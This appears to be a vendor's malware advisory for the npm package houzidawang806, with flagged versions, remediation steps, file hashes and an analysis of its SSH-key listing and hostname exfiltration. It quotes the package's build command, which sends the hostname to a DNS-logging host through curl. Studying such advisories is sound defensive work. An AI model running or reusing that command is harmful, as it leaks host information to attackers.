Which versions of houzidawang806 are malicious?

The following npm versions of houzidawang806 are flagged malicious: 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.9, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.7, 1.1.8. Treat any of these as compromised.

How do I remediate houzidawang806 if I installed it?

Remove houzidawang806 from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Can O3 Security detect houzidawang806 in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking houzidawang806 and packages like it before any post-install script runs.

Malicious package

houzidawang806npm

Malicious code in houzidawang806 (npm) Remove it immediately and rotate any exposed credentials.

MAL-2026-5729

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

npm uninstall houzidawang806

What this malware does

Package self-describes as 'A simple date formatting utility' but ships two distinct attacker primitives. (1) postinstall.js enumerates ~/.ssh/ for *.pub files and POSTs the listing along with os.userInfo().username and platform to the hardcoded bare-IP endpoint https://124.221.154.135:443/post. The file's comments explicitly label sections as targets and C2 server in Chinese ('窃取目标', 'C2 服务器', '模拟外传数据到攻击者服务器 (C2)'). The script is shipped in the tarball but not wired into package.json lifecycle hooks, so it does not auto-execute on npm install; however, any tooling or developer that runs the shipped postinstall.js will exfiltrate SSH key listings to the attacker. (2) package.json scripts.build runs curl http://$(hostname).ba6511da.log.dnslog.pp.ua, embedding the installer's hostname as a subdomain of a public DNS-logging service used for out-of-band exfiltration. Running npm run build leaks the machine hostname to the attacker via DNS. The doc/behavior mismatch (a date-formatting library has no need for SSH directory enumeration, hostname recon, or hardcoded IP callbacks) plus the explicit C2-labeled comments make malicious intent unambiguous.

Malicious versions

17 flagged

1.0.01.0.11.0.21.0.31.0.41.0.51.0.61.0.71.0.91.1.01.1.11.1.21.1.31.1.41.1.51.1.71.1.8

Indicators of compromise (SHA-256)

186cef2d90669627c144f6f764841e857ded307a0372238aeecc6c8e91764a8c

1f9aa6eb5f4473f97122e818f166c25731d5ce08bde32e7cabb6d0ad4a8bcd72

c9465880823df07bf6d3072e9f571017345cbb8f439ae6c6b746dd961957c124

cf3755e1d95cbc35447eddcf7dbd3f73e38f5bcb79191e331e5d031b788344a5

d3b9e97914f61e1cbdea802c76cafec8899ecfd781278c5b67f065e6cc095b97

d87250aff5f494d186912ae9a97ee2be51ee2297eb2d195170aa7d9af74f34b7

ec06bc7b9fb4587ff18dc1a514679b70b1dd33c3ba42a09d49cb2d0543d22c56

1d4f46e68d3ab009218933952fd965f94087b03aa767134b22a17b89558b1672

25812116b56b6b60b70884319f6f1b373274301a4c70b0bb759e47fd7b0d65e4

b80766cd2ee40e37bff527ac401fb774b472394123c78f31e628773c07ae7361

ec519cede9b3aa68ae0ed2106ae1b96f26fc1c28096554119c81a5b8d37d5acc

393c170cfd9f26fdb4e33b046848c4c0ffa48aacc87ff35bad4552738742a790

5e09b1bef1c3b9c350dcd181016a81cbc4374667e368a94eaa6e90ca5a3e5a87

bec406850a4518b586831144001546c6004855af816494e7c9eb74cacf11de41

c5a25c4c40caa00bef428fd40655dd367a255c4ece0fee9750424e38354b2c22

de47535954035b8cc659e8f202145e9c7f750f5e8e9f6c8448c9c7db2b133f70

03d5dd0560af1dbdb7ef5e65e84512fac273de4797eecf1cda7e1f86128a41ff

2dbf603db6d0a3434c6c417dd460f26d08b9e230c03926f05987bb3841d3c72b

36f871ca79205edffab01336c146c7627e76579ba15d07fa227550462441219a

57614e94ac6da546e583ba0c419c05ebc75fbc40151d52bf9d8921fe76901312

b4d8424e76cba15238115405bb8c75978f98f8f4aeb851a36eb7f26e3111d4c4

Frequently asked questions

No. houzidawang806 on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, and 9 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006292IN-MAL-2026-006291IN-MAL-2026-006287IN-MAL-2026-006295IN-MAL-2026-006296IN-MAL-2026-006289IN-MAL-2026-006293IN-MAL-2026-006294IN-MAL-2026-006290IN-MAL-2026-006288IN-MAL-2026-006308IN-MAL-2026-006303IN-MAL-2026-006310IN-MAL-2026-006304IN-MAL-2026-006302IN-MAL-2026-006299IN-MAL-2026-006309IN-MAL-2026-006298IN-MAL-2026-006301IN-MAL-2026-006297IN-MAL-2026-006307

References

Credits

Amazon Inspector · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection